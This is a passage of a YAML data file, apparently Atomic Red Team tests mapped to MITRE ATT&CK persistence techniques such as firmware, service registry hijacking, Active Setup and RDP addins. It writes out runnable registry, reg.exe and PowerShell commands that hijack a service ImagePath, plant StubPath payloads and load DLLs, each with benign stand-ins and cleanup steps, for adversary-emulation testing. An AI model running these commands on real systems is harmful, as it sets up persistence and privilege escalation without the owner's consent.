created: '2019-12-19T19:43:34.507Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1542/001
external_id: T1542.001
- source_name: McAfee CHIPSEC Blog
description: Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against
Vault 7 Disclosure Scanning. Retrieved March 13, 2017.
url: https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/
- source_name: MITRE Copernicus
description: 'Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions
about BIOS Security. Retrieved December 11, 2015.'
url: http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about
- source_name: Intel HackingTeam UEFI Rootkit
description: Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html
- source_name: Github CHIPSEC
description: Intel. (2017, March 18). CHIPSEC Platform Security Assessment
Framework. Retrieved March 20, 2017.
url: https://github.com/chipsec/chipsec
- source_name: About UEFI
description: UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.
url: http://www.uefi.org/about
- source_name: MITRE Trustworthy Firmware Measurement
description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE
Firmware Security Research. Retrieved January 5, 2016.
url: http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research
- source_name: Wikipedia UEFI
description: Wikipedia. (2017, July 10). Unified Extensible Firmware Interface.
Retrieved July 11, 2017.
url: https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface
- source_name: Wikipedia BIOS
description: Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.
url: https://en.wikipedia.org/wiki/BIOS
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:26.714Z'
name: 'Pre-OS Boot: System Firmware'
description: |-
Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jean-Ian Boutin, ESET
- McAfee
- Ryan Becwar
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Network Devices
x_mitre_version: '1.2'
identifier: T1542.001
atomic_tests:
- name: UEFI Persistence via Wpbbin.exe File Creation
auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
description: |
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
- https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
- http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
- https://github.com/tandasat/WPBT-Builder
supported_platforms:
- windows
executor:
name: powershell
command: "echo \"Creating %systemroot%\\wpbbin.exe\" \nNew-Item -ItemType
File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
-Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
elevation_required: true
T1574.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c
created: '2020-03-13T11:42:14.444Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/011
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
September 12, 2024."
url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
url: https://itm4n.github.io/windows-registry-rpceptmapper-eop/
- source_name: hexacorn
description: hexacorn. (2015, January 13). Beyond good ol’ Run key, Part 24.
Retrieved September 25, 2025.
url: https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
- source_name: Kansa Service related collectors
description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and
analysis. Retrieved October 10, 2019.'
url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html
- source_name: malware_hides_service
description: Lawrence Abrams. (2004, September 10). How Malware hides and
is installed as a Service. Retrieved August 30, 2021.
url: https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/
- source_name: Autoruns for Windows
description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96.
Retrieved March 13, 2020.
url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- source_name: MDSec
description: MDSec. (n.d.). Autodial(DLL)ing Your Way. Retrieved September
25, 2025.
url: https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/
- source_name: Registry Key Security
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
Retrieved March 16, 2017.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
- source_name: microsoft_services_registry_tree
description: Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services
Registry Tree. Retrieved August 25, 2021.
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
- source_name: gendigital
description: 'Threat Research Team. (2022, March 22). Operation Dragon Castling:
APT group targeting betting companies. Retrieved September 25, 2025.'
url: https://www.gendigital.com/blog/insights/research/operation-dragon-castling-apt-group-targeting-betting-companies
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:27.075Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the Parameters key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the Parameters key of a given services registry configuration. By placing and configuring the Parameters key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked.
For example, the registry path(Citation: MDSec) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters(Citation: hexacorn)(Citation: gendigital) contains the AutodiaDLL value, which specifies the DLL to be loaded for autodial funcitionality. An adversary could set the AutodiaDLL to point to a hijacked or malicious DLL:
"AutodialDLL"="c:\temp\foo.dll"
This ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
- Joe Gumke, U.S. Bank
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
description: |
Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service check
type: string
default: weakservicename
executor:
command: |
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
name: powershell
- name: Service ImagePath Change with reg.exe
auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
'
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service name
type: string
default: calcservice
weak_service_path:
description: weak service path
type: string
default: "%windir%\\system32\\win32calc.exe"
malicious_service_path:
description: malicious service path
type: string
default: "%windir%\\system32\\cmd.exe"
dependency_executor_name: powershell
dependencies:
- description: 'The service must exist (#{weak_service_name})
'
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
'
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
'
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
'
cleanup_command: 'sc.exe delete #{weak_service_name}
'
name: command_prompt
T1542.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
created: '2019-12-19T21:05:38.123Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1542/003
external_id: T1542.003
- source_name: Lau 2011
description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion?
(Infographic). Retrieved November 13, 2014.
url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
- source_name: Mandiant M Trends 2016
description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
November 17, 2024.
url: https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
- source_name: welivesecurity
description: 'Martin Smolár. (2023, March 1). BlackLotus UEFI bootkit: Myth
confirmed. Retrieved February 11, 2025.'
url: https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/
- source_name: Microsoft Security
description: 'Microsoft Incident Response. (2023, April 11). Guidance for
investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved
February 12, 2025.'
url: https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:28.341Z'
name: Bootkit
description: |-
Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1547:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
created: '2020-01-23T17:46:59.535Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547
external_id: T1547
- source_name: Cylance Reg Persistence Sept 2013
description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
Part 2: The Run Keys and Search-Order. Retrieved November 17, 2024.'
url: https://web.archive.org/web/20160214140250/http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
- source_name: MSDN Authentication Packages
description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1,
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
12, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
- source_name: Linux Kernel Programming
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:29.846Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network Devices
x_mitre_version: '1.3'
identifier: T1547
atomic_tests:
- name: Add a driver
auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
description: 'Install a driver via pnputil.exe lolbin
'
supported_platforms:
- windows
input_arguments:
driver_inf:
description: A built-in, already installed windows driver inf
type: path
default: C:\Windows\INF\usbstor.inf
executor:
command: 'pnputil.exe /add-driver "#{driver_inf}"
'
name: command_prompt
- name: Driver Installation Using pnputil.exe
auto_generated_guid: 5cb0b071-8a5a-412f-839d-116beb2ed9f7
description: 'pnputil.exe is a native command-line utility in Windows to install
drivers, this can be abused by to install malicious drivers. Ref: https://lolbas-project.github.io/lolbas/Binaries/Pnputil/
'
supported_platforms:
- windows
input_arguments:
driver_path:
description: Enter the driver file path to install (Default is used built-in
windows driver - acpipmi.inf)
type: path
default: C:\Windows\INF\acpipmi.inf
executor:
command: 'pnputil.exe -i -a #{driver_path}
'
name: powershell
- name: Leverage Virtual Channels to execute custom DLL during successful RDP
session
auto_generated_guid: fdd45306-74f6-4ade-9a97-0a4895961228
description: "Virtual Channels can be leveraged to alter RDP behavior using
dedicated Addins.The mechanism is implemented using DLLs which can be executed
during RDP session automatically. \nThe DLLs are loaded in the host system
only after successful connection is established with the remote system.\nOnce
the test is run, amsi.dll will be loaded on the host system during successful
RDP session.\nBlog :https://learn.microsoft.com/en-us/windows/win32/termserv/terminal-services-virtual-channels?redirectedfrom=MSDN\n"
supported_platforms:
- windows
input_arguments:
Subkey_Added:
description: New Sub key added in the registry path
type: String
default: Malware
dll_inf:
description: custom DLL to be executed
type: Path
default: C:\Windows\System32\amsi.dll
executor:
command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default\Addins\#{Subkey_Added}"
/v Name /t REG_SZ /d "#{dll_inf}" /f
'
cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal
Server Client\Default\Addins\#{Subkey_Added}" /f '
name: command_prompt
elevation_required: true
T1547.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--22522668-ddf6-470b-a027-9d6866679f67
created: '2020-12-18T16:33:13.098Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/014
external_id: T1547.014
- source_name: SECURELIST Bright Star 2015
description: Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really
Spreading through the Bright Star?. Retrieved December 18, 2020.
url: https://securelist.com/whos-really-spreading-through-the-bright-star/68978/
- source_name: Mandiant Glyer APT 2010
description: Glyer, C. (2010). Examples of Recent APT Persistence Mechanism.
Retrieved December 18, 2020.
url: https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf
- source_name: FireEye CFR Watering Hole 2012
description: Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
- source_name: Klein Active Setup 2010
description: Klein, H. (2010, April 22). Active Setup Explained. Retrieved
December 18, 2020.
url: https://helgeklein.com/blog/2010/04/active-setup-explained/
- source_name: paloalto Tropic Trooper 2016
description: Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese
Government and Fossil Fuel Provider With Poison Ivy. Retrieved December
18, 2020.
url: https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: Citizenlab Packrat 2015
description: Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved
December 18, 2020.
url: https://citizenlab.ca/2015/12/packrat-report/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:31.226Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1547.014
atomic_tests:
- name: HKLM - Add atomic_test key to launch executable as part of user setup
auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
description: "This test will create an \"atomic_test\" key under 'HKLM:\\SOFTWARE\\Microsoft\\Active
Setup\\Installed Components' to launch calc by configuring an active setup
executable and \nforcing to run active setup using the \"runonce.exe /AlternateShellStartup\"
command. \nWithout the \"runonce.exe /AlternateShellStartup\" command it would
run during the next logon for each user.\n\nNote: If you logout before running
the cleanup command, you will be required to go through the OOBE (out-of-box
experience) setup sequence to log back in. \nThe payload will only run once
unless the cleanup command is run in between tests.\n\n[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)\n"
supported_platforms:
- windows
input_arguments:
payload:
description: Payload to run once during login
type: string
default: C:\Windows\System32\calc.exe
executor:
command: "New-Item \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"
-Name \"atomic_test\" -Force\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Active
Setup\\Installed Components\\atomic_test\" \"(Default)\" \"ART TEST\" -Force\nSet-ItemProperty
\"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\atomic_test\"
\"StubPath\" \"#{payload}\" -Force \n& $env:SYSTEMROOT\\system32\\runonce.exe
/AlternateShellStartup"
cleanup_command: |-
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: HKLM - Add malicious StubPath value to existing Active Setup Entry
auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
description: "This test will add a StubPath entry to the Active Setup native
registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
\nSaid key doesn't have a StubPath value by default, by adding one it will
launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
\nWithout the last command it will normally run on next user logon. Note:
this test will only run once successfully if no cleanup command is run in
between test.\n"
supported_platforms:
- windows
input_arguments:
payload:
description: Payload to run once during login
type: string
default: C:\Windows\System32\calc.exe
executor:
command: |-
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
cleanup_command: |-
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
name: powershell
elevation_required: true
- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing
version number
auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
description: "This test will decrease the version number of the 'Internet Explorer
Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for
the current user, \nwhich will force the StubPath payload (if set) to execute.\n"
supported_platforms:
- windows
executor:
command: |
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
name: powershell
elevation_required: true
T1176.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--278716b1-61ce-4a74-8d17-891d0c494101
created: '2025-03-30T22:12:27.799Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1176/001
external_id: T1176.001
- source_name: Pulsedive
description: " Pulsedive Threat Research. (2025, March 21). Rilide - An Information
Stealing Browser Extension. Retrieved September 22, 2025."
url: https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/
- source_name: Chrome Extension Crypto Miner
description: Brinkmann, M. (2017, September 19). First Chrome extension with
JavaScript Crypto Miner detected. Retrieved November 16, 2017.
url: https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/
- source_name: xorrior chrome extensions macOS
description: Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved
April 27, 2021.
url: https://www.xorrior.com/No-Place-Like-Chrome/
- source_name: Chrome Extensions Definition
description: Chrome. (n.d.). What are Extensions?. Retrieved November 16,
2017.
url: https://developer.chrome.com/extensions
- source_name: ICEBRG Chrome Extensions
description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME
EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL
BUSINESSES. Retrieved January 17, 2018.
url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses
- source_name: Malicious Chrome Extension Numbers
description: Jagpal, N., et al. (2015, August). Trends and Lessons from Three
Years Fighting Malicious Extensions. Retrieved November 17, 2017.
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
get hacked by a Chrome extension. Retrieved September 12, 2024.'
url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
url: https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)
- source_name: Banker Google Chrome Extension Steals Creds
description: Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting.
Retrieved November 18, 2017.
url: https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/
- source_name: Browser Adrozek
description: Microsoft Threat Intelligence. (2020, December 10). Widespread
malware campaign seeks to silently inject ads into search results, affects
multiple browsers. Retrieved February 26, 2024.
url: https://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/
- source_name: Browers FriarFox
description: Raggi, Michael. Proofpoint Threat Research Team. (2021, February
25). TA413 Leverages New FriarFox Browser Extension to Target the Gmail
Accounts of Global Tibetan Organizations. Retrieved November 17, 2024.
url: https://www.proofpoint.com/uk/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global
- source_name: Stantinko Botnet
description: 'Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware
campaign operating covertly since 2012. Retrieved November 16, 2017.'
url: https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/
- source_name: Wikipedia Browser Extension
description: Wikipedia. (2017, October 8). Browser Extension. Retrieved January
11, 2018.
url: https://en.wikipedia.org/wiki/Browser_extension
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-09-22T17:00:42.545Z'
name: Browser Extensions
description: "Adversaries may abuse internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
programs that can add functionality to and customize aspects of internet browsers.
They can be installed directly via a local file or custom URL or through a
browser's app store - an official online platform where users can browse,
install, and manage extensions for a specific web browser. Extensions generally
inherit the web browser's permissions previously granted.(Citation: Wikipedia
Browser Extension)(Citation: Chrome Extensions Definition) \n \nMalicious
extensions can be installed into a browser through malicious app store downloads
masquerading as legitimate extensions, through social engineering, or by an
adversary that has already compromised a system. Security can be limited on
